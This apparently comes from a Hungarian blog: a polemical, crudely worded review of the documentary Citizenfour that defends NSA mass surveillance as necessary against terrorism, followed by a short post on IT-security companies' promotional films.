Én konkrétan amikor először láttam a Citizenfourt, a HACK-ből azzal az ötlettel ballagtam haza, hogy ez a film olyan lenyűgözően pocsék, hogy arról már írni kell. Konkrétan azért, mert a debilitásig elfogult, a valóságnak egy szeletét kibontja, de a megértéshez elengedhetetlenül szükséges aspektusokat figyelmen kívül hagyja, ami a legfájóbb az egészben, hogy tovább torzítja az emberek fejében a magánszféra integritásáról alkotott, egyébként is torz képet.

Ismétlem önmagam, de azért... A legtöbb problémát az jelenti, hogy ha információbiztonságról, security awarenessről, privacyről van szó, a többség tart olyantól, amitől nincs oka tartani és egyben nem figyel eléggé oda olyanra, amire nagyon érdemes lenne odafigyelni.

Először írok egy kicsit a filmről, ugyan igazság szerint túl sok szót nem érdemelne az egész. Nem igazán van értelme azon vitatkozni, hogy Ed Snowden most akkor a digitális kor Robin Hoodja, aki végülis leleplezte a nagy és gonosz kormányt, amelyik ármánykodva kukkolta a saját állampolgárait vagy éppenséggel Ed Snowden a bizonyíték arra, hogy a világ legkorszerűbb eszközeivel dolgozó titkosszolgálatoknál is komoly gondok vannak/voltak, ha arról van szó, hogy szakszerűen kellene kiosztani a szerepköröket és a vele járó jogosultsági szinteket azok közt az alkalmazottak közt, akik minősített adatokkal dolgoznak és végülis Ed Snowden - máig nem tudni, hogy miért - gondolt egyet, aztán vitte, amit látott. Aki Ed Snowdent szeretné Robin Hoodként látni, hát éppenséggel joga van hozzá, de azt is kívánhatnám, hogy "Snowden legyen a céges rendszergazdád..." A filmből egyébként végig nem derül ki, hogy ténylegesen mi motiválta arra, hogy fogja azokat az információkat, amiknek a bizalmas kezeléséért fizették, aztán egyszerűen ellopja, majd közzétegye azokat - már ha értelmes emberként összesen annyi indoklással nem érjük be, hogy meg akarta mutatni, hogy az USA az ördög patákkal. Snowden úgy fogalmazott, hogy "Az elnyomás eddigi leghatékonyabb fegyverét építjük az emberiség történetében", amivel még mindig nem lettünk okosabbak. Ugyanis nem igazán van nyoma annak, hogy az USA például egy ideológia sujkolására használná a nála lévő adattengert. Néha még elhangzik az a nagyokos érv, hogy a sok ideig tárolt információval az a baj, hogy később azt a kormány előszedheti. Nos, szerintem szedje is elő, ha az illető terrorizmusra adja a fejét, ha pedig nem erről van szó, akkor nem teljesen mindegy?

A filmmel végülis mindenki jól járt, a készítők bezsebeltek egy halom díjat érte, a legelborultabb konteós paranoid arcok mondhatták egymásnak, hogy ugyemegmondtuk, aki az ezzel kapcsolatos híreket egyáltalán nem követte, képbe került, csak sajnos teljesen rosszul és folytathatnám a sort. Snowden személyét most hagyjuk is, inkább foglalkozzunk azzal, hogy ez az elképesztően ostoba és akaratlanul manipulatív film hogyan viszonyul a valósághoz.

Aki nem egy kavics alatt töltötte az időt az 1990-es évek óta, annak nem kell magyarázni, hogy az USA milyen terrorveszélynek van kitéve és ennek milyen jelentősége van az egész világ biztonságpolitikájára nézve. Pontosabban a jelek szerint mégis kell magyarázni. A biztonságpolitikának nem vagyok szakértője, de ami világos, hogy ha az USA-t ér egy terrortámadás, akkor abba gyakorlatilag beleremeg a fél világ. Márpedig érné, bőven. Amire a Citizenfour még csak utalást sem tesz, hogy sosem fogjuk megtudni, hogy az Egyesült Államok szépnevű hárombetűs szervezetei mennyi és milyen típusú terrortámadást előzött meg helyben és szerte a világon. Ha viszont van valami, amiben biztosak lehetünk, hogy ha még a Bush kormányzat nem keményít be 2000. szeptembere után, de nagyon, akkor az USA-t már azóta nem USA-nak hívnák, mármint azt, ami megmaradt volna belőle.

A tömeges megfigyelés egyszerűen nem egy opcionálisan választható lehetőség volt az USA történetében, hanem az egyetlen járható út! A proaktív, preventív műveleteken kívül nincs más eszköz a terrortámadások kivédésére, a terrorizmus természetéből adódóan, ha úgy tetszik, ez a biztonság ára.

A film nem foglalkozik vele, nem is témája, de azért illett volna tisztázni azt, hogy különböző információkat kitől kellene védeni. Például az összes kommunikációs felületet kellően bonyolult jelszóval kellene védenie mindenkinek, annak tudatában, hogy lehet, hogy az nem olyan bizalmas, amit ő küldött másnak, viszont amit másvalaki küldött neki, a feladó annak tudatában küldte, hogy csak a címzett olvashatja el, nem pedig a címzett és a címzett csaja, meg annak barátnője, meg úgy mindenki, aki vagy tudja a jelszót vagy éppenséggel egy házibuliban bebaszva behuppan a gép elé, megnézné a saját emailjeit, de emberünk Gmail-es postafiókjában találja magát, mivel nem jelentkezett ki. Mindegy, hogy milyen típusú szervezetről van szó, miután felmérték, hogy kik jelenthetnek fenyegetést informatikai szempontból, annak megfelelően kell berendezkedniük. De azt a legsúlyosabb idiótákon kívül senki nem mondta, hogy az adatokat az NSA elől indokolt lenne elrejteni, csókolom! Persze, mint minden más téren, itt is egyszerűbb végletekben gondolkozni, ezért sokan gondolják úgy, hogy hiába tesznek óvintézkedéseket, úgyis van valami szaki, aki az információikhoz hozzá tud férni, ha nagyon akar, ami egy veszélyesen hülye felfogás. Hiszen ekkor az adatgazda tárva-nyitva hagyja az ajtót mindenféle Droid előtt. Például céges környezetben nem dzsímélezünk, meg nem használunk ilyen-olyan ad-based szolgáltatót ingyen, amelyik gyakorlatilag számonkérhetetlen egy adatszivárgás vagy adatvesztés esetén.

Ami pedig a tömeges megfigyelést illeti, nem tudnám mivel jobban szemléltetni a dolgot, mint ahogy tették ezt a South Park alkotói a Kormányármány epizódban, amikor Cartman azon akadt ki, hogy kövérnek és jelentéktelennek minősítették. Azaz: valóban mindenkit megfigyelnek, de nem mindenki ugyanolyan érdekes. Mondjuk ha valaki az USA-ban vallási fanatikusokkal gengel és rendszeresen robbanóanyagok előállításához szükséges összetevők nevére keres rá a neten, na, az már érdekesebb, de ez normális embernek nem sérti meg az igazságérzetét. Ahogy a reptéren is bevállaljuk az ellenőrzéssel járó szarozást, cserébe nem kell attól tartani, hogy a gép, amivel elindulunk, nem szabályosan száll majd le, hanem beleröppen egy felhőkarcolóba.

Az NSA figyel. És? Amíg nem vagyok terrorista, valahogy nem tud érdekelni. Szintén kínosan lerágott gumicsont, hogy pont manapság, egy olyan korban, ahol az egyszeri ember teljesen önként osztja meg az egész életét a neten közösségi szolgáltatásokban, rendszeresen becheckol a Foursquare-n, geotaggeli, hogy kivel, mikor hol, mit zabált, tíz évvel ezelőtt még halálosan fel volt háborodva, hogy a mobilszolgáltató  naplózza a cellainfók alapján azt, hogy éppen merre járt.

Olyan gyakorlatilag még nem igazán fordult elő, hogy valakinek indokolatlanul kellemetlenséget szerzett volna Ámerikában a Titkoszzógálat', olyan viszont tömegesen, hogy a felhasználók díszdobozban osztanak meg olyan információkat önmagukról, amivel aztán bármilyen hülye vissza tud élni.

A Citizenfour még az első felében azzal szórakoztatja a nézőket, hogy felvételeket mutat arról, ahogyan kormánytisztviselők lehazudják a tömeges megfigyelés tényét. Legyenek erősek: a titkosszolgálat attól titkos, mert a működésének több részlete nem nyilvános, nem csak önmagát, hanem az őt kiszolgáló országot veszélyeztetné, ha transzparensebbé tenné azokat a módszereket, amiknek nem szabad annak lenniük. Márpedig a sajtó természetéből adódóan, ha annak idején nem hazudják le a tömeges megfigyelés tényét, az újságírók ugyan továbbra sem tudtak volna többet tenni annál, minthogy a seggüket verik a földhöz és kitartóan óbégatnak azzal kapcsolatban, hogy bizony, az ármányos kormány megfigyel, konkrét információk nélkül nyilván még jobban burjánzottak volna a konteók, még jobban gallyra vágva ezzel az emberek biztonságtudatosságát, amit előbb emlegettem.

Nem hittem benne soha, hogy egy maréknyinál több ember lesz, akikkel erről a témáról érdemben tudnék vitázni. Másrészt - előre is elnézést a rémes összehasonlításért - valahogy ez a sztori nem lett volna eladható Julian Assange személyével. Pedig ő még csak nem is hazaáruló. :)

- Nocsak, az NSA? Tudhattam volna.
- A twitjeiről szeretnénk beszélni.
- Ember! Én csak kamuztam! Egyáltalán milyen jogon olvassa el a kormány a magánlevelezésemet? Nem hallottak még az alkotmányról?
- Dehogynem, ahogy a Függetlenségi Nyilatkozatról is. Sokan vannak, akik úgy gondolkodnak, mint maga, akik szerint a kormánynak nincs joga az állampolgárai után kutakodni, aztán egy repülő beleszáll a tornyokba és egy kislány meghal. A szabadok földjén a bátrak otthonában akar élni, ám a bátor nem szabad, ha föld nem otthon, és a föld nem otthon, amíg egyesek olyan mélyre dugnák a seggükbe az amerikai zászlót, hogy egy hétig csillagos-sávosat szarnak. Ha majd a vécén ül a csillagos fosórohammal, egy dolgot garantálhatok.
- És mit?
- Akkor már nem érdekli, hogy ki figyeli a twitterjét.

South Park 17. évad. 1. rész (magyar fordítás)

0 Tovább

Paráztatós és látványos imázsfilmek


Nemrég emlegettem, hogy a szoftverrendszerek egyre nehezebben tekinthetők át, egy-egy kiesés egyre súlyosabb társadalmi hatást vált ki, a különböző IT megoldások közti eligazodás pedig egyre nehezebb lesz. Nincs ez máshogy az IT biztonsági megoldásokkal és szolgáltatásokkal sem, ami jobb helyeken ugyan már nem vált ki viszolygást a cégvezetőkből, tény, hogy erre még mindig nem fordítanak elég figyelmet, na meg még inkább pénzt, a másik oldalon ennek megfelelően kell alakítaniuk a marketinges- és PR-csapatoknak a reklámjaikat, ami messze nem könnyű, hiszen nem pillecukor vásárlásáról kell meggyőzni a célcsoportot.

Komolyan nem tudom megmondani, hogy a következő néhány film kiket is célozna, ugyanis aki a stratégiai szintű döntéseket hozza, alighanem már úgyis hallott a legkomolyabb játékosokról, ami két reklámban is közös, hogy az elfogadhatónál nem teátrálisabb módon egy-egy történetet mutat be, ami pont a megfelelő mértékben – na jó, egy kicsit jobban – paráztatja be nézőt. Lehet mondani, hogy ezek inkább imázsfilmek, a lényeg nem is azon van, hogy most akkor reklám vagy imázsfilm, hanem azon, hogy pár perc alatt többet mondanak, mint amennyit egy-egy cégnél a vezetők szájába lehetne rágni azzal kapcsolatban, hogy miért nem érdemes az IT-biztonságon spórolni.

Ugyan ezek nem a legújabb filmek, lehet, hogy adott cégtől nem is feltétlenül a legjobbak, az összeállítás teljesen szubjektív.

A Deloitte egy korábbi reklámfilmjében Dzsimi görkorcsolyázó prostiktól kap egy pendrive-ot, amivel aztán persze az lesz az első dolga, hogy hazamegy és jól lefertőzi vele a céges gépet, majd kezdődik is a dráma. A film amúgy jó kezdő spanyolosoknak is, mert a felirat nélküli változatot hirtelen nem találtam. [update: eredeti videó frissítve]

Az IBM egyik legújabb filmjében Törpapa tabletjét fertőzik meg Törpilláék, aminek következtében romba dől fél Aprajafalva közlekedési rendszere. Aztán mégsem.

A Lockheed Martin mosóporreklámjában tényleg minden felvillan a kijelzőkön, ami éles környezetben garantáltan nem, sztorija mondjuk nincs, de nem is hiányzik, mivel a nagypapás hanghordozással vakeráló narrátor mindent visz.

0 Tovább